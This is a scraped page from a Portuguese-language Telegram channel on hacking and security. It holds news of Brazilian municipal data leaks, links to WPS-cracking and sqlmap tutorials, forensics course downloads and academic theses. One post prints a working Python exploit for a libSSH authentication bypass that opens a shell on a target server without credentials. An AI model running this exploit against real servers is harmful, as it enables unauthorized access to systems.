Ruby Of Security – Telegram
Ruby Of Security
1.14K subscribers
151 photos
9 videos
114 files
1.03K links
Here you will find content like:

🌎 Notícias | 📡 Tecnologia | 🌐Hacking
📚 Cursos | Ferramentas | 📝Tutoriais

@DARKNET_BR
@TIdaDepressaoOficial
@ExploitHub
@AcervoDoSam

Acervo:@AcervoRubyOfSec

Group:@RubyOfSecGroup

© Ruby Of Security - 2014 - 2019
Download Telegram
Ferramentas Livres para Teste de Invasao.pptx
116.3 KB
Ferramentas Livres para
Testes de Invasao

@RubyOfSec
Invasão em rede WPS


Como todos nós sabemos a rede WPA2 oferece um recurso que permite ao usuário se conectar a ela através de um PIN é aí que entra a vulnerabilidade, o Kali linux oferece uma infinidade de ferramentas dentre elas uma chamada Bully.


🌎
@RubyOfSec


https://rubyofsec.wordpress.com/2018/10/10/invasao-em-rede-wps/
Forwarded from DARKNET BR
📚 #Ebook
🔖 Wireless Hacking

@DARKNET_BR
Forwarded from DARKNET BR
Wireless Hacking.pdf
2 MB
Vazamento de Dados – São João da Boa Vista – Purpl3Pand4

Nosso sistema de Monitoramento Avançado Persistente identificou, em 10/10, nova publicação nos site de compartilhamento de texto Pastebin.com contendo vazamento de dados do município de São João da Boa Vista/SP.

A ação foi reivindicada pelo hacker brasileiro Purpl3Pan4. A motivação para o leak foi claramente político-ideológica, com explícita menção a
#OpEleiçãoContraOFascismo convocada pelo AnonOpsBR.

🌏
@RubyOfSec

https://www.defcon-lab.org/vazamento-de-dados-sao-joao-da-boa-vista-purpl3pand4/
Identificando WAF/IDS/IPS Pelo Sqlmap


A grande maioria de amadores na segurança da informação cometem o erro de sairem rodando quaisquer ferramentas sobre uma aplicação web, e isso pode comprometer sua integridade e anonimato além de trazer contratempos indesejáveis na fase de condução de um Pentest, por isso deve-se utilizar meios para identificar as proteções que o alvo possui.


https://rubyofsec.wordpress.com/2018/10/10/identificando-waf-ids-ips-pelo-sqlmap/


🌏@RubyOfSec
Pentest-Machine - Automates Some Pentest Jobs Via Nmap Xml File

Automatiza algum trabalho pentesting através de um arquivo XML nmap. Assim que cada comando termina, grava sua saída no terminal e os arquivos em output-by-service / e output-by-host /. Executa comandos de retorno rápido primeiro. Por favor me envie protocolos / comandos / opções que você gostaria de ver incluídos.

🌏
@RubyOfSec

https://www.kitploit.com/2018/10/pentest-machine-automates-some-pentest.html
Vazamento de Dados – Pardinho e PMMG – Lil_Sh4wtyy

Nosso sistema de Monitoramento Avançado Persistente identificou, em 18/10, publicação no site de compartilhamento de texto Ghostbin contendo vazamento de dados do município de Pardinho/SP e publicação no Twitter com imagem de busca de vulnerabilidade na página da Polícia Militar de Minas Gerais (PM/MG). As ações foram realizadas pelo hacker brasileiro Lil_Sh4wtyy, integrante da equipe ElitePentesting.

O vazamento do município de Pardinho/SP inclui nomes de tabelas da base de dados e credenciais de acesso (usuário/senha) em texto claro.

🌏
@RubyOfSec

https://www.defcon-lab.org/vazamento-de-dados-pardinho-e-pmmg-lil_sh4wtyy/
libSSH Authentication Bypass

libSSH suffers from an authentication bypass vulnerability.

Bypass;

#!/usr/bin/env python3
import paramiko
import socket
import argparse
from sys import argv, exit


parser = argparse.ArgumentParser(denoscription="libSSH Authentication Bypass")
parser.add_argument('--host', help='Host')
parser.add_argument('-p', '--port', help='libSSH port', default=22)
parser.add_argument('-log', '--logfile', help='Logfile to write conn logs', default="paramiko.log")

args = parser.parse_args()


def BypasslibSSHwithoutcredentials(hostname, port):

sock = socket.socket()
try:
sock.connect((str(hostname), int(port)))

message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()

message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)

spawncmd = transport.open_session()
spawncmd.invoke_shell()
return 0

except paramiko.SSHException as e:
print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable")
return 1
except socket.error:
print("Unable to connect.")
return 1


def main():
paramiko.util.log_to_file(args.logfile)
try:
hostname = args.host
port = args.port
except:
parser.print_help()
exit(1)
BypasslibSSHwithoutcredentials(hostname, port)

if name == 'main':
exit(main())


fonte: https://exploit.kitploit.com/2018/10/libssh-authentication-bypass.html
Falha crítica de segurança afeta VLC e outros players de mídia

Foi descoberto uma vulnerabilidade de execução de código remoto na biblioteca de streaming de mídia LIVE555. O conjunto de bibliotecas C++ LIVE555 é utilizado por players de mídia muito utilizados no mercado, como o VLC e o MPlayer.

Mantido pela empresa Live Networks, a biblioteca trabalha com protocolos RTP/RTCP, RTSP ou SIP, com a capacidade de processar formatos de vídeo e áudio como MPEG, H.265, H.264, H.263+, VP8, DV, JPEG, MPEG, AAC, AMR, AC-3 e Vorbis.

Atualize os seus players de mídia, como o VLC e o MPlayer

A falha descoberta deixa milhões de usuários dos media players vulneráveis à ciberataques, segundo Lilith Wyatt, pesquisadora da Cisco Talos Intelligence Grupo. No caso, a brecha reside na funcionalidade de análise de pacotes HTTP, que analisa cabeçalhos HTTP para encapsulamento de RTSP sobre HTTP, explica o The Hacker News.


🌏@RubyOfSec

https://m.tecmundo.com.br/amp/seguranca/135385-falha-critica-seguranca-afeta-vlc-outros-players-midia.htm?__twitter_impression=true
#SabiasQue #Ghostman #RFS

Sabias que ?

Ser um hacker ético é uma das melhores formas de usar o conhecimento sobre a segurança da informação, pois assim contribuímos para a segurança mundial.
Reportando vulnerabilidades, realizando Testes de penetração, etc.
O Mundo precisa de mais pessoas que estudam a segurança da informação para praticar o bem, ou seja, usar a ética hacker.



🌎@RubyOfSec
TESTE DE VULNERABILIDADES
EM APLICAÇÕES WEB

Prof: NÍCHOLAS ANTUNES CINTO
Data: 09/16/2015 3:19:17 PM
Creator: Microsoft® Word 2013
Link: https://cepein.femanet.com.br/BDigital/arqTccs/1211330211.pdf


ANÁLISE DE VULNERABILIDADES EM
APLICAÇÕES ANDROID COM O USO DE
FERRAMENTAS DE TESTE DE INTRUSÃO E A
METODOLOGIA OWASP

Prof: DIMAS ALBUQUERQU
E MENDES
Data: 12/21/2017, 5:08:28 AM
Creator: Microsoft® Word 2016
Link: http://www.cin.ufpe.br/~tg/2017-2/dam4-tg.pdf

🌎@RubyOfSec

Para pedir algum arquivo que deseja, entre no grupo, vamos avaliar e consultar nosso banco de dados e verificar se temos o conteudo.; https://news.1rj.ru/str/rubyofsecgroup
Computer Hacking Forensic Investigator (CHFI)

CHFI Module 1 Introduction
http://www.mediafire.com/file/yinvs2vtn4ix9z0/CHFI_Module_1_Introduction.rar

CHFI Module 2 Forensics & Investigation Process
http://www.mediafire.com/file/9yai0s961xkb7p3/CHFI+Module+2+Forensics+Investigation+Process.rar

CHFI Module 3 Searching & Seizing
http://www.mediafire.com/file/l16n7as0zc5fgb4/CHFI_Module_3_Searching_&_Seizing.rar

CHFI Module 4 Digital Evidence
http://www.mediafire.com/file/3ajk8erktw1a4ug/CHFI+Module+4+Digital+Evidence%282%29.rar

CHFI Module 5 Responder Procedures
http://www.mediafire.com/file/8oarrkysj2pyymo/CHFI_Module_5_Responder_Procedures.rar

CHFI Module 6 Forensic Lab
http://www.mediafire.com/file/jqqoiy6ko91ov5c/CHFI_Module_6_Forensic_Lab.rar

CHFI Module 7 Hard Disks & File Systems
http://www.mediafire.com/file/unk51i52idt53ay/CHFI_Module_7_Hard_Disks_&__File_Systems.rar

CHFI Module 8 Windows Forensics
http://www.mediafire.com/file/6azb12untw5itww/CHFI_Module_8_Windows_Forensics.rar

SHELL SHOCK, [21.10.18 19:18]
CHFI Module 9 Data Akquisition & Duplication
http://www.mediafire.com/file/3dzf4qdln3pn6qi/CHFI_Module_9_Data_Acquisition_and_Duplication.rar

CHFI Module 10 Recovering deleted Files & & partitions
http://www.mediafire.com/file/ifl18p77a10c2az/CHFI_Module_10_Recovering_Deleted_Files_and_Partitions.rar

CHFI Module 11 Using Access Data FTK
http://www.mediafire.com/file/2zabeg7axi7cwdd/CHFI_Module_11_Using_Access_Data_FTK.rar

CHFI Module 12 Using EnCas
http://www.mediafire.com/file/m1nop2yk6pwsvn0/CHFI_Module_12_Using_EnCase.rar

CHFI Module 13 Steganography
http://www.mediafire.com/file/5aay0ed5uzt8y97/CHFI_Module_13_Steganography.rar

CHFI Module 14 Password Crackers
http://www.mediafire.com/file/k16714g10alwwkb/CHFI_Module_14_Password_Crackers.rar

CHFI Module 15 Log Correlation
http://www.mediafire.com/file/990ili11icinm5c/CHFI_Module_15_Log_Correlation.rar

CHFI Module 16 Network Forensics
http://www.mediafire.com/file/qsrr2yn0ptreyre/CHFI_Module_16_Network_Forensics.rar

CHFI Module 17 Wireless Attacks
http://www.mediafire.com/file/ip1ded3iumcr3dg/CHFI_Module_17_Wireless_Attacks.rar

CHFI Module 18 Web Attacks
http://www.mediafire.com/file/ldrew3v8x298htu/CHFI_Module_18_Web_Attacks.rar

CHFI Module 19 Email Crimes
http://www.mediafire.com/file/82xh758lt2by927/CHFI_Module_19_Email_Crimes.rar

CHFI Module 20 Mobile Investigation
http://www.mediafire.com/file/8lu73yi1s79iw1b/CHFI_Module_20_Mobile_Investigation.rar

CHFI Module 21 Investigative Reports
http://www.mediafire.com/file/jz70shpdzso40ne/CHFI_Module_21_Investigative_Reports.rar

CHFI Module 22 Expert Witness
http://www.mediafire.com/file/926yco1rhqo2ow2/CHFI+Module+22+Expert+Witness.rar
LISTA DE ABREVIATURAS E SIGLAS


ADT: Android Development Tools

ART: Android Runtime

API: Application Programming Interface

APK: Android Package Kit

DVM: Dalvik Virtual Machine

HTTP: Hypertext Transfer Protocol

HTTPS: Hypertext Transfer Protocol Secure

IDE: Integrated Development Environment

IETF: Internet Engineering Task Force

RFC: Request For Comments

JVM: Java Virtual Machine

JNI: Java Native Interface

SDK: Software Development Kit

SSL: Security Socket Layer

TLS: Transport Layer Security

UI: User Interface

OWASP: Open Web Application Security Project

🌎@RubyOfSec